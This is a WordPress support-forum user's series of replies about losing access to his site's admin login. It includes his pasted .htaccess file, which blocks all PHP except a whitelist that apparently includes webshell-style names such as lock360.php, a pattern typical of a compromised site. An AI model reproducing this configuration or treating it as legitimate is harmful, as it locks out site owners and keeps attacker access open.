dunkhood
Forum Replies Created
-
Forum: Fixing WordPress
In reply to: WP AdminI really appreciate your help and patience James, does anyone else have any ideas please i have tried all of the above
TIA
Duncan
Forum: Fixing WordPress
In reply to: WP Adminhiya James i have done all that and its no different, still doesnt give me admin login
Forum: Fixing WordPress
In reply to: WP AdminHi James, nothing at all i’m happy for someone to have a look in there if it is easier, i don’t have a problem with my other site and cant understand it
Forum: Fixing WordPress
In reply to: WP Adminits also made another .htaccess file i have noticed, sorry to be a pain
- This reply was modified 5 years, 4 months ago by dunkhood.
Forum: Fixing WordPress
In reply to: WP AdminHi i have done that and still the same outcome
Forum: Fixing WordPress
In reply to: WP Adminthis is whats in my .htaccess file
<FilesMatch “.(py|exe|php)$”>
Order allow,deny
Deny from all
</FilesMatch>
<FilesMatch “(about.php|radio.php|index.php|content.php|lock360.php)$”>
Order allow,deny
Allow from all
</FilesMatch>
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>Forum: Fixing WordPress
In reply to: WP Adminno i dont think so it was all fine and seems to have gone in the last week or so ive only got two plugins on there
Askimet and superb-helper
Sorry if i sound dumb
Forum: Fixing WordPress
In reply to: WP AdminHi i changed the name of the plugins but that didnt work, i then changed the name of the theme as you say to try and activate the default but the page was just white sorry i’m at a loss should i try to rename the plugins and the theme at the same time?
any help would be greatForum: Fixing WordPress
In reply to: WP Adminit just shows the website but no admin login
http://traditionalhandmadebricks.co.uk/wp-login.php/?redirect_to=http%3A%2F%2Ftraditionalhandmadebricks.co.uk%2Fwp-admin%2F&reauth=1 it then goes to this
Sorry to sound dumb but i am when it comes to this lol